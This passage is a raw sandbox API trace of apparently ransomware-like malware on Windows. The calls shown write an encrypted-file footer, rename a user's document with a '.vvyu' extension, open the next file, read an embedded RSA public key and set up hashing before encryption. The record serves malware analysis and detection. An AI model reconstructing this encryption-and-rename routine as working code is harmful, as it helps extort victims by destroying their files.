hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0194.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ae0 | out: hHeap=0x620000) returned 1 [0194.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0194.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ab0 | out: hHeap=0x620000) returned 1 [0194.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0194.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0194.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ac8 | out: hHeap=0x620000) returned 1 [0194.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0194.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0194.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0194.243] GetCurrentThreadId () returned 0x66c [0194.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0194.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2e9fc80 [0194.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0194.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0194.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0194.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0194.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0194.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0194.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.244] GetCurrentThreadId () returned 0x66c [0194.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0194.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0194.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0194.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0194.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccac90 [0194.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0194.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0194.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0194.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ac8 [0194.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0194.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0194.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0194.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0194.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0194.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0194.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0194.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0194.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ab0 [0194.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0194.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0194.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0194.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0194.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0194.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0194.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0194.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ae0 [0194.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0194.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0194.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0194.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2af8 [0194.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0194.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2b10 [0194.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0194.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0194.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0194.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b28 [0194.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0194.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b40 [0194.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0194.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2b58 [0194.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b40 | out: hHeap=0x620000) returned 1 [0194.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2b40 [0194.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b28 | out: hHeap=0x620000) returned 1 [0194.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0194.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0194.247] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0194.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0194.247] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0194.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ab0 | out: hHeap=0x620000) returned 1 [0194.247] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ab0 [0194.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0194.247] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea3a68 [0194.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ac8 | out: hHeap=0x620000) returned 1 [0194.247] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0194.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b58 | out: hHeap=0x620000) returned 1 [0194.247] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea3c78 [0194.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0194.247] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0194.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0194.247] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0194.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ab0 | out: hHeap=0x620000) returned 1 [0194.247] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea3e90 [0194.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0194.248] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0194.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0194.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0194.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0194.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0194.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0194.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0194.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3c78 | out: hHeap=0x620000) returned 1 [0194.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3e90 | out: hHeap=0x620000) returned 1 [0194.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0194.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0194.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b40 | out: hHeap=0x620000) returned 1 [0194.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0194.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b10 | out: hHeap=0x620000) returned 1 [0194.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0194.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ae0 | out: hHeap=0x620000) returned 1 [0194.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2af8 | out: hHeap=0x620000) returned 1 [0194.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0194.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0194.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0194.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2a98 | out: hHeap=0x620000) returned 1 [0194.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0e70 | out: hHeap=0x620000) returned 1 [0194.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.252] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0194.252] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac90 | out: hHeap=0x620000) returned 1 [0194.252] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0194.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0194.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0194.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0194.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0194.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0194.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0194.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0194.254] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x54e6, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x54e6, lpOverlapped=0x0) returned 1 [0194.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0194.255] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x54eb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.255] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0194.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0194.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0194.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea3a68 [0194.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea3a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0194.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea3e98 [0194.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0194.256] WriteFile (in: hFile=0x568, lpBuffer=0x2ea3e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea3e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0194.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3e98 | out: hHeap=0x620000) returned 1 [0194.257] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0194.257] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0194.257] CloseHandle (hObject=0x568) returned 1 [0194.258] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0194.258] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2ea3a68 [0194.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0194.259] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\Z1NiZTMoyaVazPqQ.rtf" (normalized: "c:\\users\\keecfmwgj\\documents\\z1niztmoyavazpqq.rtf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\Z1NiZTMoyaVazPqQ.rtf.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\z1niztmoyavazpqq.rtf.vvyu")) returned 1 [0194.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.263] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0194.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cd50 | out: hHeap=0x620000) returned 1 [0194.266] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e8cce40, ftCreationTime.dwHighDateTime=0x1d8a385, ftLastAccessTime.dwLowDateTime=0x900a740, ftLastAccessTime.dwHighDateTime=0x1d8a3dc, ftLastWriteTime.dwLowDateTime=0x900a740, ftLastWriteTime.dwHighDateTime=0x1d8a3dc, nFileSizeHigh=0x0, nFileSizeLow=0x6a20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zlIY3__yM6-.csv", cAlternateFileName="ZLIY3_~1.CSV")) returned 1 [0194.266] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0e70 [0194.266] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0194.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0e70 | out: hHeap=0x620000) returned 1 [0194.266] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\zlIY3__yM6-.csv") returned=".csv" [0194.266] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\zlIY3__yM6-.csv" (normalized: "c:\\users\\keecfmwgj\\documents\\zliy3__ym6-.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0194.267] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=27168) returned 1 [0194.267] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0194.269] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x69fa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.269] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0194.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0194.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.272] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.272] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x6a20, lpOverlapped=0x0) returned 1 [0194.273] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0194.273] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.273] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.273] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0194.274] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0194.274] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0194.274] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0194.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0194.274] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0194.274] GetLastError () returned 0x0 [0194.275] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0194.275] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0194.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0194.275] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0194.275] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0194.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0194.275] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0194.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0194.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x6a20) returned 0x2ea79b0 [0194.276] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0194.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0194.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0194.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0194.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0194.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0194.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0e70 [0194.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2a98 [0194.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0eb8 [0194.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2af8 [0194.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ae0 [0194.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b10 [0194.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b40 [0194.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0194.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0194.277] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0194.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea3a68 [0194.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ae0 | out: hHeap=0x620000) returned 1 [0194.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b40 | out: hHeap=0x620000) returned 1 [0194.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b10 | out: hHeap=0x620000) returned 1 [0194.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0194.277] HeapFree (in: hHeap=0x620000, 